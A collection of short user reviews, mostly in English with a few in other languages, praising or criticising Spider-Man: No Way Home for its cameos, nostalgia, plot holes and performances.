Best Spiderman film ever with great fan service and a great story.
I Definitely Recommend This Movie To The Marvel Fans Because It's So Good.
An action-packed rollercoaster of emotions and unexpected twists!
By far, this is one of the greatest Spider Man movies ever created in mankind! This is the 1st greatest movie after Endgame! From unexpected Andrew and Tobey's return to the visual effects, music and cinematography, this is the absolute definition of "ABSOLUTE CINEMA!" 
Must watch for every Spider Man fan. Childhood memories were brightened up! Best movie in the Multiverse Saga!!!
Expecting more from Spider Man 4...until unless, more excited to see what will happen in Doomsday!
The greatest Spider-Man movie ever made. No doubt. I will always watch it until I am gone from life. This still comes so highly recommended.
Spidermen keren banget sangat cocok untuk mengisi waktu liburan
Probably The Greatest 2021 Movie!!
Probably The Greatest 2021 Movie Ever!
I really enjoy this multiverse movie, especially with characters from Raimi's Sipder Man film series and Webb's Amazing Spider-Man film series.

However, the first issue is whether Green Goblin understood the full consequences of destroying the Macchina de Kadavus—either risking the multiverse or just hoping to return to his own universe. The lack of clarity on his awareness of the dimensional rifts weakens the stakes, making his actions feel less deliberate.

The second issue is that the film doesn’t clarify how Goblin’s plan to conquer the MCU would play out or how catastrophic it might be, leaving his plot underdeveloped and less threatening.
The plot is flawed, but everything else is so much fun you forget about it.
This was one of the best films since Avengers: Endgame This film goes very deep in bringing back a lot of familiar faces past and present. When I watched it for the first time I was on the edge of my seat because I didn't know what to expect, but when we saw all 3 Spider-Man's together everyone was cheering to the top of their lungs in seeing them all together. Plus Tom Holland and Zendaya's chemistry was perfect. I hope this happens again in the future when get closer to the end of the Multiverse Saga and I believe there will be a lot of success for Spider-Man in the future.
The best time I had at the theater with the whole family. Loved the atmosphere of all the fans cheering at the big moments
When this movie first came out, everyone (including me) thought it was a masterpiece, but after rewatch, I realized its not as good as I remember. Still a good film but nothing special.
Spider-Man No Way Home is a great movie with a horrible first act. The lead up to Andrew and Tobey is an atrocious plot line that makes no sense. However after that it’s a 10/10 but because of that it’s a 92%
JUST INCREDIBLE. Everything about this movie feels so respectful and loving of the Spider-Man character. All three Spider-Men brought their A game and it shows. The growth of Tom’s Peter is done so beautifully and the tragedy behind it is enough to make some cry. This is a must watch no questions asked.
Excellent movie. Nothing wrong with it. AT ALL
I dont need to say much except this movie was a freakin Comic book movie, and the way they showed how mature Peter has gotten since his first apperance was absolutely amazing. The entire movie was fan service and i loved it. My theater went crazy when all the cameos appeared. This was the next most exciting movie after Endgame and i think anyonr can agree on that. I loved how they concluded his "Highschool" time as spider man and now we are going into Adult Spider man and i thought the visuals were amazing. I loved Peter kinda learned that sacrifices need to be made in order to save the people you love and the world and he did that by making everyone forget who he was, i mean EVERYONE.
A treat to Spiderman fans , remove the cameos and it's still a good film with a good story
Probably my favorite Spider-Man movie thus far, it wraps up several storylines quite nicely, and pays omage to the incredible movies that came before it.
This film undoubtedly stands out in terms of spectacular action, a witty script and unforgettable emotional moments
This movie is an incredible celebration of Spider-Man's cinematic legacy. While the initial premise is kind of weak, the second and third acts easily make up for it, combining spectacle, humor, two different huge emotional moments, and unbelievable levels of nostalgia to create easily one of the best Spider-Man movies ever made.
Honestly it was amazing 9/10 it’s really fun to see all the live action spider-man came in the MCU universe and it’s fight scenes are legit bro and if your probably ally wandering about the he ending it’s very interesting I noticed that Peter Parker is a little mature and older if you look closely and there is a new suit and Peter has a apartment which will make him love more rough and more tough choices for the next!
GREATEST MOVIE OF ALL TIME MA KAZABBBBB KHAYE YAAAA
***SPOILERS***

Spider-Man: No Way Home is a long, but extremely entertaining movie, with one twist that surprised me: this trilogy is only the origin story.

In the beginning of Homecoming, I thought this is an established Spider-Man. I thought the Uncle Ben stuff had already happened and he had given Peter the important lesson. Later we could see he had a lot of potential to grow, but I never expected that it would take him three movies to become Friendly Neighborhood Spider-Man. I realised this when Aunt May died, which has the same function as Uncle Ben's death in the previous movies. I knew about almost all the other twists and cameos. It still managed to be enjoyable, even though I didn't like some of the characters from the previous movies (Electro, Sandman). Seeing all three live action Spider-Mans was an incredible experience. The twist at the end is heart-breaking, but I also think it's unnecessary. I believe it could've been handled better, but I don't dislike it, because it's gut-wrenching and that was the perfect example of being a hero means sacrifice. The characters are well-used, MJ and Peter had a lot of growth.

The directing is great, it must be hard to keep an overstuffed movie like this going. The cinematography and the editing are okay good, while he visual effects are outstanding. The pacing could've been better, the beginning was too long, but if it wasn't the movie would feel more overstuffed, so it's not a big issue for me. The casting is perfect, they managed to bring in so many people from the previous movies. Tom Holland became one of my favourite actors throughout this journey. It was awesome to see Tobey Maguire and Andrew Garfield reprising their roles too, while the two greatest Spider-Man villains returned, performed by Willem Dafoe and Alfredo Molina. Jon Favreau is great too.

Spider-Man: No Way Home is incredible fan service. It's a little too long, but it punched me hard at the end and I feel the impact every time I think about this movie.
The third Movie in the Spiderman Franchise is without doubt a visual masterpiece with a whole new Adventure for Peter Parker (Spiderman), Andrew Garfield and Tobey Maguire team up with Spiderman in a capitulating finale to the well awaited Movie Franchise.
An epic crossover finale that builds the stakes and emotions of the characters through tough trials and exciting crossovers with the other spiderman franchises that give a mostly satisfying conclusion to all three spiderman sagas (aside from the ending wiping the slate clean and undoing all the character growth with the memory wipe spell. Like how the hell isn’t Peter homeless now?). Tom Holland and Zendaya have adorable chemistry together. No wonder they’re dating in real life cause they’re adorable together onscreen. I love how everyone actually support each other, unlike most spiderman movies where peter’s supposed loved ones tend to dick around and abandon him whenever he needs them the most. It makes you care and appreciate the characters all the more. The fanservice was mostly great too. Even a Matt Murdoch cameo! The action was terrific and the onscreen chemistry between everyone was so entertaining. The deep emotions were powerful and gave some great emotional stakes for the climax. It’s so endearing to see all these returning characters we grew up with interacting with the newest MCU characters and receive their  own narrative epilogues for closure. Overall, it’s a wonderful love letter to Spiderman that was only minorly affected by the somewhat questionable ending. But the highs were so great that it easily elevates the movie to be among the best Spiderman movies. Right up there with Spider-Verse as my favorites. I guess Spiderman just does wonders with multi-verses.
Filme espetacular, superou minhas expectativas, qualidade impecável, e como um grande fã do homem aranha, me deixou contente, ver os três homens aranhas, um ótimo trabalho!
This was great to have all 3 Spidermans in the movie.
Out of all means! Spider-Man No Way Home was amazing to watch. One of my favorites out of them all. 🤩
This movie was so good I loved Andrew Garfield and Tobey Miguers  experience.
A very nice movie.The  story was very gripping and amazing.The villain—Green Goblin played by the legendary William Dafoe was very well written.The special effects were very realistic.The actors were brilliant.The action scenes were awesome.Spiderman has everything good you would ever except from a Spiderman movie.
Spider-Man: No Way Home bounces from hilarious to hurt with ease as both the darkest and funniest MCU Spider-Man entry to date.
Loved it perfect nothing bad and tom was amazing but I did not like the way tobey and Andrew entered should’ve released after multiverse of madness
What a movie. Unquestionably one of the best MCU movies ever.
Entertainment: 4/5
Marketing: 4/5
Writing: 3.5/5

For general audience: 76%
For pop-culture audience: 78%
For writing-based audience: 74%
Spider-Man finally enters the Spider-Verse in live action with a very big impact. With the villains of the previous Peter Parker’s entering Tom Holland’s timeline and causing madness within the world, Peter has to capture and cure them all of their respective issues that created them. But when horrors arise, Peter needs to be the ultimate Spider-Man and save everyone with help from his friends. This movie, while probably runs on pure nostalgia fuel, gives fans exactly what they wanted with this movie. With stories clashing, Spider-Man characters interacting, and some of the best villains of comic book history running amok in the MCU, it is strangely hypnotic and endlessly rewatchable. It feels like a love letter to Spider-Man fans and it finally gives Tom Holland’s Spider-Man his chance to be his own hero.
Spider Man fans from all generations of life will be united with this one film
Exceeded my expectations
Super good I loved how they had sandman, doctor octopus, lizard, electro, green goblin and they are all together I liked doctor strange actual I didn’t like him I liked the humor and all the spider men at the end
I think this is the best Spider Man movie you could possibly ask for, and it gave fans what they wanted. What this movie did brought tears of nostalgia to my eyes. And if you claim to be a Spider-Man fan but have never watched this movie… There is something seriously wrong with you. GO WATCH THIS MOVIE! :D
One of the best marvel movies out there. It was amazing seeing all three spider man working together fighting their villians.
it was an ok movie i didn't think much of it until andrew garfield came on the screen but overall it was enjoyable
This was a well movie
Excellent!

Spider-Man is my favorite Marvel comic book character - since I was four years old in the seventies I had hand me down ratty books with great stories about the Shocker and Rhino. I loves the SM books and this story arc felt like an arc from back then.

The characters were all relatable and the overall plot was good. The use of previous characters and the mixing of the Multi-verse and Spider-verse ideas from previous movies worked way better than I would have expected it to on paper. 

One of my favorite Marvel movies and one I'll look forward to seeing again some day.
The plot is unbelievably stupid. Movie is fun for when you don't know what else to watch.
They managed to really sell the "old" spider men though. Thank you for bringing back Maguire and Garfield!
Maybe I’m biased because I love Spider-Man so much but this movie is an instant classic. This one of those movies you can see at everyone’s house on a DVD rack. Everyone in the cast did their big one !
I love spider-man no way home, it's my favorite movie of all time.
Spider-man: No way home was awesome. Very humorous. An Amazing mix with each villain. The only part I was not crazy about is the ending. It was so-so. But the rest of the movie was great
It was the most entertaining movie I've ever seen in my life!After watching the entire trilogy, I realized that Peter has finally grown up and become Spider-Man, which was a great experience!When Toby and Andrew showed up I felt like saying welcome back! Thank you for the wonderful surprise!
The Green Goblin and Electro's nostalgic yet new costumes were cool, and Doctor Octopus has also become one of my favorite characters.
It was a work that made me want to say thank you to the director and others for making it and showing it to us! Thank you so much!
have a special place in my heart, it was peak to see it first time in cinema
Like every MCU movie, it's way too long and follows a generic structure, but thanks to the well-cast and enthusiastic actors, it's quite entertaining. Spider-Man and Doctor Strange are two of my favorite heroes in the MCU, and having them both in one movie adds a lot to the experience (even if Strange spends most of the film wandering through some other dimension).

"No Way Home" is the darkest and most emotional Spider-Man movie to date (excluding the two animated stories about Miles Morales) and executes its story with a level of commitment I honestly didn’t expect from modern Disney productions.

As for the fan service: it's tolerable since the plot moves at a high pace most of the time. However, I enjoyed the villains much more than Garfield/Maguire, with Willem Dafoe, my personal favorite, leading the pack. The movie teases a Sinister Six film, which probably will never happen anyway.

As for the "Venom" teaser in the credits—let's just pretend that never happened.
This is one of the beat spiderman films of all time
Tom andrew tobey all on a 1 screen feels like a dream come true and all the vilians is so entertaining overall Fun entertaining and a masterpiece
Its definitely a good movie, but not better than far from home. And Its really cool to see all of the spidermans together.
it had potential, maybe the next one will hold more promise .Colin Ferrell's performance was great couldn't tell it was him
Great spiderman movie that hits all the right stuff
spiderman no way home is so awesomeeeeeee
Average but the movie is only the cameos not the script Itself
It's pretty good just no room to make a sequel
The best movie of the century. It's the cross over movie everyone has been waiting.
bro this movie is great
“With great power, comes great responsibility.” They did that quote justice!
Special effects, storyline, photography, amazing!
This film is cinema but also not the best at the same time .
“The Multiverse Unleashed.”

In my opinion one of the best Spider-Man movies in the franchise. It was very well done. The cinematography was insane (especially in that one scene). Loved the whole idea of the film. 5/5 stars.
Very well told story, Willem Defoe at his best. Enjoyable ride.
this teenage boy almost destroy the world..
Good movie. Very enjoyable
Spider-Man No Way Home is good I know it has it's flaws but why do people hate Spider-Man No Way Home? Marvel literally gave us what we needed at first it people loved it now people hate it??? I love this 10/10 Movie my second favorite MCU Movie after Avengers Endgame.
Such a fun watch! Keeps you glued to the seat the whole time. Great story and action overall.
For the fans. Just incredible to bring back Tobey Maguire and Andrew Garfield and all the original villains. Bravo.
Excellent movie, I loved every moment, thank you Spiderman.
Direção: Bom
Atuação: Bom
Roteiro: Bom
Caracterização: Bom
Soundtrack: Bom
Definitivamente es buena, fueron muy astutos a la hora de promocionarla, pero tiene 80 agujeros argumentales, cómo por ejemplo: Spiderman desconcentra a Doctor Strange, Electro nunca conoció a Peter Parker y aún así apareció, los villanos se deben curar no matar, llegaron versiones diferentes de Spiderman y finalmente, el olvido de todos en el mundo no tiene nada que ver con devolver villanos a sus respectivos universos. Fue buena, es entretenida, pero no lo pienses mucho que le encontrás muchos errores.
Excellent movie, good to watch with family and friends!
Spider-Man: No Way Home is a celebration of Spider-Man’s legacy on the big screen and one of the MCU’s most ambitious films to date. It’s a love letter to fans that balances nostalgia with meaningful storytelling, delivering a movie that’s emotionally rich, action-packed, and incredibly satisfying. For Spider-Man fans, it’s a dream come true, providing closure, excitement, and a strong path forward for Tom Holland’s Peter Parker.
Great movie because they gave Andrew more lines than Tobey.
Was very Hype movie. I just cant imagine watching it again. Solid 7.6/10!
Maybe Tom Hollands finale as Spider-Man? Not sure, however the directors sure knew how to revive the franchise and excite fans. A well-casted and thoroughly enjoyable film, 100% worth a watch!
You must watch every live-action Spiderman movie in production order before this last finale. It is a perfect delivery for the fans.
I love this movie. I love Spiderman. I have seen every Spiderman movie up to this point. This is one of my favorite Spiderman movies. It is so much fun to watch. It made me cry a lot. Rip aunt may. It was overall a great movie. I loved seeing all the Spidermans together.
This movie really only suffers from being released in the same year as one of the best, perhaps the best spider-man movies to have ever released — Across the Spidey-Verse — besides that, great movie, clearly there is still a movie to be had after this and I love that, love seeing Tom playing Peter. The complete mind wipe of everyone is heartbreaking but I still loved the lovely crossover event we had, it’s like a lukewarm ATSV. Great, because ATSV is still greater. Enough glazing, seeing the moments old villains interact with new, Doc Ock’s redemption arc, the Spider-Man’s meeting? ADORE THAT??? But electro not being called out for being the only one off the sinister six to genuinely willfully, consciously choose to do harm with his powers for the sake of power is disheartening. The lizard was delusional, sandman wanted to go back home, green goblin was basically possessed, and doc ock redeemed himself.

On top of that, the mindwipe really doesnt make sense to me unless it also ties in with the spider-verse plot?!? Which would go absolutely crazy.
AWESOME MOVIE I DONT EVEN HAVE TO EXPLAIN
Making Spider-Man (person?) diverse is hardly an original idea, despite this, this is actually a pretty good movie
The Best Spider-Man Film Evet Made!!! The film has got everything and Tom Holland gives it his all as the lead in this cinematic masterpiece!
Best spider man movie and best movie of 2021
Spider-Man No Way Home is the 2nd best live action Spider-Man movie (right behind Spider-Man 2) and Tom Holland is still the best live action Spider-Man actor. There are no flaws for this movie.
Silencing the little snob in me, which would command looking down at superhero movies as a matter of principle, I'll say this was an extraordinarily satisfying movie.
It felt like the makers had a maddeningly complex equation system with 80 variables in it - and, astonishingly, solved it perfectly.
An insane amount of time and work must have gone into planning this.
The number of seemingly conflicting goals and balances this movie manages to achieve is too numerous to be listed, so leave it at that: it's original, thoughtul, doesn't cut corners and takes itself and its viewers seriously, while never forgetting to entertain and keep pace.
The icing on the cake: the acting is sublime.
Congrats.
I thought that it was fun but not better than the first
“Spider-Man: No Way Home” has some of the best fan service put on screen and the second half is such an emotional rollercoaster that it makes up for the first half being a bit of a bumpy ride to get through.
for me it is the best of Tom Holland's Spider-Man saga. Jon Watts has outdone himself this time and managed to make a masterpiece better than Andrew and Tobey's films. beautiful
While it functions as a concluding work to the previous works, I am glad that the careful portrayal of the characters' psychology at each important point in the film was compared to Peter.
Not a fan of Tom's Spider-Man and to be honest, Tobey Maguire was the only reason I even gave this a shot. After watching it, I fell in love with the film. This really is a love letter to all Spider-man fans no matter what actor you like as the character.
No Way Home was one of the best theater experiences I’ve ever had. I’ll forever be grateful for this movie for reintroducing Tobey Maguire as Spider-Man and the villains of the Raimi trilogy. I can’t wait to see what happens with these characters next
was one of the best marvel movies recently
A couple problems here and there but a glimpse of hope in the sea of garbage that is recent Marvel movies.
Spider-Man: No Way Home is not just a superhero movie—it’s a groundbreaking moment in cinematic history. The film brilliantly pulls off the multiverse concept, bringing together all three Spider-Man actors—Tom Holland, Andrew Garfield, and Tobey Maguire—in a way that fans had only dreamed of. Seeing them share the screen was a surreal experience, and it’s no wonder the internet is filled with viral videos of audiences going wild in theaters. The energy was electric, and I felt like I was part of something truly special.

From the very first moment the multiverse opened up, I knew I was in for something incredible. Watching all three Spider-Men interact, trading stories, and fighting side by side was a once-in-a-lifetime experience. The blend of nostalgia, humor, and action was perfect, and I found myself cheering out loud multiple times.

But beyond the sheer excitement, No Way Home dives into deep emotional territory. Each Spider-Man comes with their own history, and the film doesn’t shy away from those past stories. The message of redemption, second chances, and the weight of responsibility was powerful, and it gave the movie so much heart. I couldn’t help but feel a huge sense of appreciation for how they handled each character’s journey, especially the raw emotion Tom Holland’s Peter Parker experiences.

I was completely hooked from start to finish. I was cheering for the three Spider-Men as they teamed up, feeling joyful as they worked together to take on iconic villains from across their respective universes. The film strikes a perfect balance between fan service and a strong, emotional story. The action scenes were nothing short of epic, and they had the entire theater on the edge of their seats. I’ve never been in a movie where the audience was so reactive, and it made the experience that much more memorable.

The movie’s flexibility in combining humor, intense action, and heart-wrenching moments was impressive. One second I was laughing at their playful banter, and the next I was tearing up over their shared struggles and triumphs. It’s rare to see a film that can handle such a range of emotions so flawlessly.

The curiosity of how the multiverse storyline would play out kept me fully engaged. I couldn’t wait to see how each new character would enter the fray, and how the different Spider-Men would interact with one another. I was confident from the moment they appeared that No Way Home had achieved something truly groundbreaking—not just in superhero films, but in cinema as a whole.

The film is a testament to what happens when you take bold risks and put faith in both your characters and your audience. It shows that even in a world of fantastical powers, the real heroism lies in perseverance, forgiveness, and choosing to do what’s right, no matter the cost.

In short, Spider-Man: No Way Home isn’t just a movie—it’s a cultural event. It brings together years of Spider-Man history in a way that pays tribute to the past while still forging ahead into new, exciting territory. This film will be remembered for years to come as the ultimate Spider-Man experience, and I feel lucky to have been there to witness it.
Filme cabuloso demais esse na minha opinião é o melhor filme do homem aranha👌🏻👍
Loved the movie brought back my childhood seeing all 3 Hoping for Andrew and Tobey to continue there story
Seriously one of the best things I’ve ever seen in my life. Tobey returning is one of the greatest things I have witnessed. Words cannot explain how much I loved this. Now 3 years later I still love it, and I will always continue to. Wish I can go back to 2021 to experience it again…
A wonderful and beautiful movie, especially the return of Toby Maguire and Andrew Garfield to the role of Peter Parker and Spider-Man, and I was about to cry but get ahold of my self
not bad but this is the worst film of the trilogy
3 Spidermen??? ILL TAKE IT!!!
Nothing better to watch during covid nothing better anyway
I love spider man. This is where Tom becomes spider man.
Best live-action Spider-Man movie ever made!
The only reason I gave 4 stars is because they freaking filled this movie with nostalgia.... I mean the acting and swings were good and all but they nerfed doc strange really badly i ain't a docter strange fan but seeing him loose to a 18 year old is........ Quite hard to see i get it he held him self back but so did Peter. But great acting and action thumbs 👍👍👍👍👍👍👍👍👍
Tobey Maguire, Andrew Garfield and the villains elevate the film!

However, Jon Watts' action part is very weak.

But as a fan, the fan service was wonderful!
I do like it, I really do. However I find it to be weakest of the Tom Holland Spider man movies because I feel like they were trying WAY too hard with Spider man references and they were just throwing a bunch of stuff at once. But I still like the film.
I hated the first two Tom Holland movies But this one was awesome 
Weird how the other two Spider-Men aren't listed in the cast and crew considering it's the best part of the movie
Poor spider man, he was forgotten for the sake of the world. Seeing the three spider men together was the best thing ever, this is heavily underrated.
Visivamente è molto bello rivedere questi personaggi perché tende ad espandere l’umorismo accogliente ma secondo me non c’era bisogno di espandere tutto questo peso sul tema del multiverso attraverso ritmi intensi e buchi di trama favoriti ma era stato carino rivedere tutti. 7/10
Even looking past the cameo-fest, this movie was still really entertaining
Everything a Spider-man fan can dream of! This movie is a blast with great acting, a fun story, and plenty of the web-slinging humor we all know and love.
Un film divertente, nostalgico e adrenalinico che però nascondono una trama molto debole
Spider-Man: No Way Home is everything a Spider-Man fan could ask for and then some. This movie has you hooked from the start all the way to the credits and ends off the Home trilogy perfectly!
It truly is a marvel movie
I think this is one of the superhero films ever made but every one knows Peter has no way home just go and see it you will find out what I mean
This is a movie you can only fully experience once. The excitement to see Andrew Garfield and Tobey Maguire come back was amazing. They took over the entire movie. The theatres were going crazy. Second time watching it isn't as good because you know exactly what's going to happen, but that's for all movies I guess.
Spider-Man, Spider-Man, does whatever a spider can. This movie does it all, loved seeing Andrew Garfield suit up again.
This movie had it all. From the cast to the effects. Very refreshing to see my childhood Spider-Men share a screen with the current Spider-Man. This movie was near perfect and one of the best from the Disney age of Marvel.
Interesting concept and refreshing to see Andrew Garfield and Tobey Maguire reappearing as Spiderman as I haven't seen them over a decade ago as that role. It brings nostalgia and the chemistry between the 3 Spidermans has been subtle and well blended. The story didn't have as much action as I would see but it does fit the title of No Way Home. I will be optimistic to see the next film in series if there happens to have an actual sequel.
Cant stop watching it
Tom Holland is a great Spiderman.
It's a work of art. Plus all of the actors coming together is a dream. Plot is amazing and it's a must see.
This movie is one of the best super hero movie's know to man
The Spiderman movie was fantastic because, all of Spiderman's costumes were really good. Especially the last costume he wore because it was classic. The movie had better humor then the last one. The special effects were fantastic. The stunts were well played. You must see it if you want to be entertained.
Spider-Man No Way Home is Tom Holland's best film and the best film of phase 4 of the MCU, Tobey and Andrew are incredible, the villains have improved a lot and Tom has evolved a lot, 10/10
Most Fav movie , absolutely love it 😍
I waited for so long to watch this back in 2019 when I heard there was a Spiderman 3 with Tom Holland. The title left so much to the imagination and when we heard rumors of Andrew and Tobey coming back I was hyped. Then I thought they might just be small cameos, but NOPE! It was a fan service dream done super well.
Maybe the best movie ever. Absolute MASTERPIECE
Top tier Spider Man film! I laughed, I cried, it was an emotional roller coaster.
Best action movie that cheer you up. Tom Holland is the best.
Se você nunca viu este filme, está perdendo, é o melhor que eu já vi e mesmo com muitas coisas 'ruins' é MUITO BOM!
It was a really good movie. Very instructive. I really liked it. I will watch it again later.Also, I really like the small details of the movie.
A heartfelt story told in a mind boggling setting with brilliant performances from the actors
just watched a 2 and a half hour movie of a nonsense media headline that ruin the entire plot and a naif + hypocrite TALKATIVE teenager
Het gaat niet beter worden dan dit! De 3 Spider-Man's die samen vechten was een fantastisch moment.
Nostalgia, you're a b*tch
Tom Holland gives an amazing performance as Peter Parker/Spiderman, this movie is just truly amazing and is superb fan service, even though the plot is not that masterful, the movie will not fail to give you an amazing time.
In my opinion, this film is very enjoyable to watch and also very nostalgic, 3 Spider-Man in one film is very crazy, that's my opinion, that's why I give it a 10
best movie made by marvel after endgame
A perfect love letter to any spiderman fan, young and old! Story isn't the strongest but it's definitely the spiderman event we've been waiting for!
This is the Best Christmas Gift i got from Sony from 2021 Spider-Man!!
If it isn't my favorite movie of all time, it's easily my favorite MARVEL movie of all time.
Did my boi Andrew some justice & made Toby so enjoyable.
As someone that always enjoyed Toby as Spider-Man but find him super cringe this movie made him feel so good as a Spider-Man.
He suits a more mature "dad" Spider-Man.
Movie was just so daym good.
better than my mother❤️
This is literally the greatest crossover ever. Even the scene when Andrew Garfield saves Zendaya from falling to her death is the best redemption for a character who lost someone in their life.
One of the greatest films of the all times.
One of the best Spider-Man films, not only brings the nostalgia of the three spiders but also the excitement of seeing them face their respective villains. Also placing emphasis on Dr. Octopus, who redeemed himself as a villain, giving more face to the character in Tobey Maguire's second Spider-Man film.
It doesn’t matter how much Nostalgia you want to put in a movie. This movie feels like something things don’t add up in the script. But seeing Tobey and Andrew back was a delightful experience. I personally grew up watching Tobey but I felt like was cheated. Overall good movie.
Ei, Marvel, cadê o tio Ben?
The greatest Spider-Man movie ever made!
Fan service the movie. I'm all for it.
As a life long Spider-Man fan this movie had me in tears of joy and tears at the emotional notes of this film. Now my #1 Spider-Man film of the entire franchise.
A huge mess, but enjoable
Simply the best Spider-Man movie!
The regular edition I give it 4 stars but the extended edition I give it 4.5 stars 🌟
Filled with a good emotional story with some fan service by bringing in characters from previous live action Spider-Man movies.
"Spider-Man: No Way Home" is a spellbinding web-slinging adventure that gets better with every rewatch. As a lifelong Spidey fan, this film is pure magic. The convergence of multiverses is handled masterfully, bringing together beloved characters from different eras. Tom Holland delivers his best performance yet, perfectly balancing Peter Parker's youthful earnestness and the weight of his responsibilities. 

The emotional depth is profound, and the action sequences are breathtaking. Nostalgia blends seamlessly with fresh, high-stakes drama, creating a rollercoaster of excitement and sentiment. The surprise appearances and fan service are done just right, hitting all the sweet spots without feeling forced.

Visually stunning and brilliantly paced, "No Way Home" is a thrilling homage to Spider-Man's legacy. Each rewatch reveals new layers and details, making it a truly rewarding experience. This is a love letter to fans and a high point in the Marvel Cinematic Universe.
My favorite Spider Man movie ever. Truly a work of art.
A brilliant sequel, Tom was born to play Spider-Man The action is fantastic, breathtaking cameos, 10
Loved this movie greatest movie I've ever seen andrew and tobey returning was awesome all the villians from previous spider man movies was great 5 star movie watch it now!!!
YES YES YES YES YES YES YES YES
Spiderman no way home is an incredible movie, no matter how many times I watch it I never get tired of watching it. 
 Every time I see it I discover new things. It may have some problems, but the good things outweigh the bad.
Spoiler Alert

The opening 45 minutes are nonsense,  turning Dr Strange into a rash fool. Zendaya can't act. Anyhow she doesn't. 

But when Toby  appears and the three Spideys share woes?  Home run. I applauded out loud.
BEST SPIDER-MAN EVER.
Freaking spectacular movie
No Way Home will break your heart, bring tears to your eyes, make you laugh, and take your breath away. No Way Home uses Doctor Strange properly, reducing its ties to the MCU and bringing Spider-Man back to his roots. The world of comics is returning. There is no way home. It could have ruined this trilogy with a script full of problems and questions. But with a strong and perfect script, it reaches the fans and amazes you.
There is no way home succeeds in doing what no other studio has been able to do. Watch three generations of Spider-Man!
There is no way home, despite all the characters it has, but it ends the story of Peter Tom Holland.
No Way Home is like a potion that combines all the strengths of the previous Spider-Man films.
I think these descriptions are enough because I can't name this masterpiece with words. Proudly, the best comic book movie of all time.
10 out of 10.
I love Spider-Man! And this one knocked it out of the park! ❤️🕷️❤️🕷️❤️🕷️
10/10 best movie in Tom Holland trilogy and start for Peter Parker closer to the comics.
Great to see Toby's Spider-Man again, I think that is why most of the people liked this movie.
A really unique spin on the superhero movie. Having different generations meet and work together, really gives you the feels. Special mention for Zendaya, because her performance was just amazing. Love this movie!
An entertaining popcorn movie that is boosted by the addition of some favourites from past Spider-Man movies.
An Absolute Must-See!
The most ovvereated movie ever, withouth the other spiderman this film isn't a good film, It doesn't have much of a plot
MY FAV SPIDER-MAN MOVIE
Spider Man: No Way Home may have multiple plot holes and and awkward bits, but it overcomes that with its obvious care for the fan base and strong emotional beats.
What an spectacle! Waiting yo see this kind of movies again (and eager to pay the cinema ticket to do it)
A mix of nostalgia and amazing writing. Perfect film.
Three words. Sentimental, Phenomenal, and Exhilarating 5/5
Better than the first time seeing it in theaters
It means nothing, and is hideous to look at. How does any of this work as a sequel to Homecoming and/or Far From Home? How can a ridiculously expensive production not be bothered to make basic things like sets, props or costumes? How can a movie that is adamant about its supposed message feature a protagonist who is completely vacant of his own beliefs? Why is it so ugly? Truly discouraging that poorly directed, horribly edited, and written-by-Reddit slop like this is what will bring masses to the theater.
Felt like I was seeing it for the first time! Loved it
Some of the lights were on during the entirety of the movie, other than that the experience was great
Goosebumps all over again
IT HAS ALL 3 spider-man actors!!!!!
Incredible on the big screen!! Still the best Spider-Man live action movie since Spider-Man 2!
Exactly what I needed
Incredible indeed! Totally incredible.
Was boring until the other Spidermen show up. Its good to see those characters again and makes the whole movie, even though they appear about an hour into it only. Worth the time and its good that the other Spider-Man movies are part of this.
This movie is gave me along with everybody in my theater pure happiness! Aside from the amazing visuals, this movie gave everyone a sense of nostalgia and excitement.
Another good addition to the Spiderman series. High budget, great actors, amazing special effects. Its a long film and I don't think I ever got that immersed in the story as it has all pretty much been seen before. It was watchable though.
Great cast, great story, great ending. A bit slow at some parts, but I could watch this on repeat!
Bit overrated, but still good.
This movie is an absolute gift of film! The callbacks and references to other Spider-Man franchises and cameos are cherries on top. The story, characters, acting, CGI, costumes, humor, action, adventure and literally everything else about this movie is also perfect. In my opinion, this is the greatest film of the MCU and the greatest crossover film of all time!
I was impressed, too much action to remember, the spiderverse, the villains and characters, the story, everything, absolutely everything is: Perfect
I don’t get the hype🤢🤢😵‍💫
"Spider-Man: There is no Way Home" is an gripping 2021 film made in the USA by Marvel Studio, which was dubbed into Russian and came out on December 15. The genre of the film is fantasy with elements of an action movie. "There is no Way Home" became the highest-grossing film of 2021 in the United States after it’s premiere. The worldwide collections of the film "Spider-Man: There is no Way home" amounted to 587.2 million dollars.

Peter Parker's worst nightmare came true - everyone found out that he was Spider-Man, and besides, perhaps a criminal and a villain.
This cast a shadow of apprehension not only towards his person, but also affected close people.
So Peter turned to Dr. Strange for help, so that he could make everyone forget him. But what about Peter's girlfriend, family, friends? He interferes with the spell and the consequences were not long in coming.

Starring Tom Holland, Andrew Garfield and Tony Maguire, who incredibly acted their characters. Supporting characters such as Zendaya, Benedict Cumberbatch and others also complemented the plot perfectly. The graphics and special effects are made of very high quality and are complemented even more by theme tune. 

To summarize, I have to admit that this is one of the most interesting and vivid films about Spider-Man - exciting, a good laugh, interesting and even moving at some points, so I would be happy to advise you to watch it and unwind - and it doesn't matter if you are a addict of Maguire, Garfield or Holland, because this movie will appeal to most viewers. The picture of the film is catchy and exciting from the beginning to the very end.
Spider-Man has No Way Home is an American superhero film set in New York City and was nominated for an Oscar, three Kids' Choice Awards. 
The plot of the film is very exciting and exciting. The main character accidentally frees the villains and is going to save them. The main character is looking for villains and tries to help them so that they can safely leave his dimension. Meanwhile, from other changes, the main characters from other parts of spider-Man appear.
The acting and the cast are on top. The main role in the film is played by all the " spiders". But I like Spider-Man as Tobey Maguire the most.
Overall, for me, Spider-Man No Way Home is the best movie I've seen in a while.
Spider-Man: No Way Home is one of my favorite movie of all time, It's good to see Tobey and Andrew in the big screen again.
Not as good without a cinema audience whooping and pissing themselves. It's kinda meh at home.
The film has a simple and somewhat weak plot due to some plot holes. The CGI is a little mixed. The film plays a lot on nostalgia which if it weren't for this would probably have flopped. The action scenes are very enjoyable, we see a good evolution of Peter Parker's character.
solid four stars but like a really good four stars
A cinematic masterpiece! Brings together decades of actors, storylines, emotions and themes. Really something for everyone through this movie. For the Marvel fanatics this movie is so endorsed in easter eggs and makes you re-live the old Spiderman movies while also experiencing Tom Holland's unique Spiderman journey. Has romance, comedy, thrills and melancholy! Absolute 5/5 from me.
Spider man action never gets old
La batalla final es épica con los 3 Spider-Mans los efectos especiales son espectaculares fue increíble incluir a los villanos originales
The apartment scenes are the best part. Andrew is still my favorite.
This movie was the epitome of predictable Marvel. I honestly had more fun with that awful American Chavez movie. It's just boring
This movie is just a nostalgia fest and that's why I love it so much
It was the greatest movie I've seen in my entire lifetime
